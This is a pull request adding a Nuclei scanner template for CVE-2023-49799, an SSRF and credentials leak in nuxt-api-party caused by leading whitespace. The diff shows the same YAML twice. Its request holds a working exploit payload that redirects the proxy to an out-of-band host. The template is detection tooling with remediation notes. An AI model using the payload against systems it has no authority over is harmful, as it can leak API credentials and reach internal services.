### PR TITLE
Add CVE-2023-49799 Template

### DIFF
--- a/http/cves/2023/CVE-2023-49799.yaml
+++ b/http/cves/2023/CVE-2023-49799.yaml
@@ -1,47 +1,47 @@
-  id: CVE-2023-49799
+id: CVE-2023-49799
 
-  info:
-    name: nuxt-api-party - SSRF & Credentials Leak via Whitespace Bypass
-    author: eeche(Changhyun Lee)
-    severity: high
-    description: |
-      nuxt-api-party allows developers to proxy requests to an API without exposing credentials to the client. This vulnerability allows an attacker to change the baseURL of the request using leading whitespace, potentially leading to credentials being leaked or SSRF.
-    impact: |
-      The vulnerability allows an attacker to:
-      - Leak sensitive API credentials by bypassing URL validation.
-      - Perform Server-Side Request Forgery (SSRF) attacks, potentially accessing internal services or resources not intended to be exposed.
-    remediation: |
-      - Update `nuxt-api-party` to version `0.22.0` or later.
-      - Sanitize inputs by removing any leading or trailing HTTP whitespace.
-    reference:
-      - https://github.com/johannschopplich/nuxt-api-party/security/advisories/GHSA-3wfp-253j-5jxv
-      - https://nvd.nist.gov/vuln/detail/CVE-2023-49799
-      - https://fetch.spec.whatwg.org/#http-whitespace-byte
-      - https://github.com/johannschopplich/nuxt-api-party/commit/72762a200fc19d997a0f84bce578c28698dc5270
-    classification:
-      cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
-      cvss-score: 7.5
-      cve-id: CVE-2023-49799
-    tags: cve, cve2023, ssrf, nuxt, credentials-leak, web, oob
+info:
+  name: nuxt-api-party - SSRF & Credentials Leak via Whitespace Bypass
+  author: eeche(Changhyun Lee)
+  severity: high
+  description: |
+    nuxt-api-party allows developers to proxy requests to an API without exposing credentials to the client. This vulnerability allows an attacker to change the baseURL of the request using leading whitespace, potentially leading to credentials being leaked or SSRF.
+  impact: |
+    The vulnerability allows an attacker to:
+    - Leak sensitive API credentials by bypassing URL validation.
+    - Perform Server-Side Request Forgery (SSRF) attacks, potentially accessing internal services or resources not intended to be exposed.
+  remediation: |
+    - Update `nuxt-api-party` to version `0.22.0` or later.
+    - Sanitize inputs by removing any leading or trailing HTTP whitespace.
+  reference:
+    - https://github.com/johannschopplich/nuxt-api-party/security/advisories/GHSA-3wfp-253j-5jxv
+    - https://nvd.nist.gov/vuln/detail/CVE-2023-49799
+    - https://fetch.spec.whatwg.org/#http-whitespace-byte
+    - https://github.com/johannschopplich/nuxt-api-party/commit/72762a200fc19d997a0f84bce578c28698dc5270
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
+    cvss-score: 7.5
+    cve-id: CVE-2023-49799
+  tags: cve, cve2023, ssrf, nuxt, credentials-leak, web, oob
 
-  requests:
-    - method: POST
-      path:
-        - "{{BaseURL}}/api/__api_party/__proto__"
-      headers:
-        Content-Type: application/json
-      body: |
-        {
-          "path": " https://{{interactsh-url}}"
-        }
-      redirects: false
-      matchers-condition: or
-      matchers:
-        - type: word
-          part: interactsh_protocol
-          words:
-            - "http"
-        - type: word
-          part: interactsh_protocol
-          words:
-            - "dns"
+requests:
+  - method: POST
+    path:
+      - "{{BaseURL}}/api/__api_party/__proto__"
+    headers:
+      Content-Type: application/json
+    body: |
+      {
+        "path": " https://{{interactsh-url}}"
+      }
+    redirects: false
+    matchers-condition: or
+    matchers:
+      - type: word
+        part: interactsh_protocol
+        words:
+          - "http"
+      - type: word
+        part: interactsh_protocol
+        words:
+          - "dns"

--- a/http/cves/2023/CVE-2023-49799.yaml
+++ b/http/cves/2023/CVE-2023-49799.yaml
@@ -1,0 +1,47 @@
+  id: CVE-2023-49799
+
+  info:
+    name: nuxt-api-party - SSRF & Credentials Leak via Whitespace Bypass
+    author: eeche(Changhyun Lee)
+    severity: high
+    description: |
+      nuxt-api-party allows developers to proxy requests to an API without exposing credentials to the client. This vulnerability allows an attacker to change the baseURL of the request using leading whitespace, potentially leading to credentials being leaked or SSRF.
+    impact: |
+      The vulnerability allows an attacker to:
+      - Leak sensitive API credentials by bypassing URL validation.
+      - Perform Server-Side Request Forgery (SSRF) attacks, potentially accessing internal services or resources not intended to be exposed.
+    remediation: |
+      - Update `nuxt-api-party` to version `0.22.0` or later.
+      - Sanitize inputs by removing any leading or trailing HTTP whitespace.
+    reference:
+      - https://github.com/johannschopplich/nuxt-api-party/security/advisories/GHSA-3wfp-253j-5jxv
+      - https://nvd.nist.gov/vuln/detail/CVE-2023-49799
+      - https://fetch.spec.whatwg.org/#http-whitespace-byte
+      - https://github.com/johannschopplich/nuxt-api-party/commit/72762a200fc19d997a0f84bce578c28698dc5270
+    classification:
+      cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
+      cvss-score: 7.5
+      cve-id: CVE-2023-49799
+    tags: cve, cve2023, ssrf, nuxt, credentials-leak, web, oob
+
+  requests:
+    - method: POST
+      path:
+        - "{{BaseURL}}/api/__api_party/__proto__"
+      headers:
+        Content-Type: application/json
+      body: |
+        {
+          "path": " https://{{interactsh-url}}"
+        }
+      redirects: false
+      matchers-condition: or
+      matchers:
+        - type: word
+          part: interactsh_protocol
+          words:
+            - "http"
+        - type: word
+          part: interactsh_protocol
+          words:
+            - "dns"


### PR DESCRIPTION
### Template / PR Information

<!-- Explains the information and/or motivation for update or/ creating this templates -->
<!-- Please include any reference to your template if available -->

- Author: Changhyun Lee
- Added CVE-2023-49799
- References:
      - https://github.com/johannschopplich/nuxt-api-party/security/advisories/GHSA-3wfp-253j-5jxv
      - https://nvd.nist.gov/vuln/detail/CVE-2023-49799
      - https://fetch.spec.whatwg.org/#http-whitespace-byte
      - https://github.com/johannschopplich/nuxt-api-party/commit/72762a200fc19d997a0f84bce578c28698dc5270

### Template Validation

I've validated this template locally?
- [x] YES
- [ ] NO


#### Additional Details (leave it blank if not applicable)

<!-- Include Shodan / Fofa / Google Query / Docker / Screenshots if available -->
<!-- Include HTTP/TCP/DNS Matched response data snippet if available -->
<!-- Please do NOT include vulnerable host information in pull requests -->
<!-- None of the prerequisites are obligatory; they are merely intended to speed the review process. -->

nuxt-api-party allows developers to proxy requests to an API without exposing credentials to the client. However, this vulnerability allows an attacker to modify the baseURL of the request using leading whitespace, which could potentially lead to credential leakage or SSRF.


I was one of the contributors to [PR #10487](https://github.com/projectdiscovery/nuclei-templates/pull/10487), but since it was closed, I am re-evaluating the issue and submitting a new PR.

### Additional References:

- [Nuclei Template Creation Guideline](https://nuclei.projectdiscovery.io/templating-guide/)
- [Nuclei Template Matcher Guideline](https://github.com/projectdiscovery/nuclei-templates/wiki/Unique-Template-Matchers)
- [Nuclei Template Contribution Guideline](https://github.com/projectdiscovery/nuclei-templates/blob/master/CONTRIBUTING.md)
- [PD-Community Discord server](https://discord.gg/projectdiscovery)